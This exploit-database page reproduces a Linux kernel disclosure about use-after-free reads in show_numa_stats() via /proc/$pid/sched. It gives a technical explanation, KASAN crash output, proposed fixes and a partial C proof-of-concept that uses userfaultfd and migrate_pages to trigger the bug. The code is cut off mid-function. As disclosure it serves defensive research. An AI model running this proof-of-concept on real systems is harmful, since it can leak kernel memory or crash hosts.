Linux useafterfree reads in show_numa_stats() Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-08-12 |
Type : dos |
Platform : linux
This exploit / vulnerability Linux useafterfree reads in show_numa_stats() is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
/*
On NUMA systems, the Linux fair scheduler tracks information related to NUMA
faults in task_struct::numa_faults and task_struct::numa_group. Both of these
have broken object lifetimes.
Since commit 82727018b0d3 ("sched/numa: Call task_numa_free() from do_execve()",
first in v3.13), ->numa_faults is freed not only when the last reference to the
task_struct is gone, but also after successful execve(). However,
show_numa_stats() (reachable through /proc/$pid/sched) locklessly reads data
from ->numa_faults (use-after-free read) and prints it to a userspace buffer.
To test this, I used a QEMU VM with the following NUMA configuration:
[ 909.490121] The buggy address belongs to the object at ffff8880ac8f8f00
which belongs to the cache kmalloc-128 of size 128
[ 909.491564] The buggy address is located 0 bytes inside of
128-byte region [ffff8880ac8f8f00, ffff8880ac8f8f80)
[ 909.492919] The buggy address belongs to the page:
[ 909.493445] page:ffffea0002b23e00 refcount:1 mapcount:0 mapping:ffff8880b7003500 index:0xffff8880ac8f8d80
[ 909.494419] flags: 0x1fffc0000000200(slab)
[ 909.494836] raw: 01fffc0000000200 ffffea0002cec780 0000000900000009 ffff8880b7003500
[ 909.495633] raw: ffff8880ac8f8d80 0000000080150011 00000001ffffffff 0000000000000000
[ 909.496451] page dumped because: kasan: bad access detected
[ 909.497291] Memory state around the buggy address:
[ 909.497775] ffff8880ac8f8e00: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb
[ 909.498546] ffff8880ac8f8e80: fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc
[ 909.499319] >ffff8880ac8f8f00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 909.500034] ^
[ 909.500429] ffff8880ac8f8f80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 909.501150] ffff8880ac8f9000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
[ 909.501942] ==================================================================
[ 909.502712] Disabling lock debugging due to kernel taint
============================
->numa_group is a refcounted reference with RCU semantics, but the RCU helpers
are used inconsistently. In particular, show_numa_stats() reads from
p->numa_group->faults with no protection against concurrent updates.
There are also various other places across the scheduler that use ->numa_group
without proper protection; e.g. as far as I can tell,
sched_tick_remote()->task_tick_fair()->task_tick_numa()->task_scan_start()
reads from p->numa_group protected only by the implicit read-side critical
section that spinlocks currently imply by disabling preemption, and with no
protection against the pointer unexpectedly becoming NULL.
I am going to send suggested fixes in a minute, but I think the approach for
->numa_group might be a bit controversial. The approach I'm taking is:
- For ->numa_faults, just wipe the statistics instead of freeing them.
- For ->numa_group, use proper RCU accessors everywhere.
Annoyingly, if one of the RCU accessors detects a problem (with
CONFIG_PROVE_LOCKING=y), it uses printk, and if the wrong runqueue lock is held
at that point, a deadlock might happen, which isn't great. To avoid that, the
second patch adds an ugly hack in printk that detects potential runqueue
deadlocks if lockdep is on. I'm not sure how you all are going to feel about
that one - maybe it's better to just leave it out, or do something different
there? I don't know...
I'm sending the suggested patches off-list for now; if you want me to resend
them publicly, just say so.
*/
volatile int uaf_child_ready = 0;
static int sfd_uaf(void *fd_) {
int fd = (int)(long)fd_;
/*
prctl(PR_SET_PDEATHSIG, SIGKILL);
if (getppid() == 1) raise(SIGKILL);
*/
while (1) {
char buf[0x1000];
ssize_t res = pread(fd, buf, sizeof(buf)-1, 0);
if (res == -1) {
if (errno == ESRCH) _exit(0);
err(1, "pread");
}
buf[res] = '\0';
puts(buf);
uaf_child_ready = 1;
}
}
int main(int argc, char **argv) {
if (strcmp(argv[0], "die") == 0) {
_exit(0);
}
sched_fd = open("/proc/self/sched", O_RDONLY|O_CLOEXEC);
if (sched_fd == -1) err(1, "open sched");
// allocate two pages at the lowest possible virtual address so that the first periodic memory fault is scheduled on the first page
char *page = mmap((void*)0x1000, 0x2000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
if (page == MAP_FAILED) err(1, "mmap");
*page = 'a';
// handle the second page with uffd
int ufd = syscall(__NR_userfaultfd, 0);
if (ufd == -1) err(1, "userfaultfd");
struct uffdio_api api = { .api = UFFD_API, .features = 0 };
if (ioctl(ufd, UFFDIO_API, &api)) err(1, "uffdio_api");
struct uffdio_register reg = {
.mode = UFFDIO_REGISTER_MODE_MISSING,
.range = { .start = (__u64)page+0x1000, .len = 0x1000 }
};
if (ioctl(ufd, UFFDIO_REGISTER, ®))
err(1, "uffdio_register");
// make sure that the page is on the CPU-less NUMA node
unsigned long old_nodes = 0x1;
unsigned long new_nodes = 0x2;
if (migrate_pages(0, sizeof(unsigned long), &old_nodes, &new_nodes)) err(1, "migrate_pages");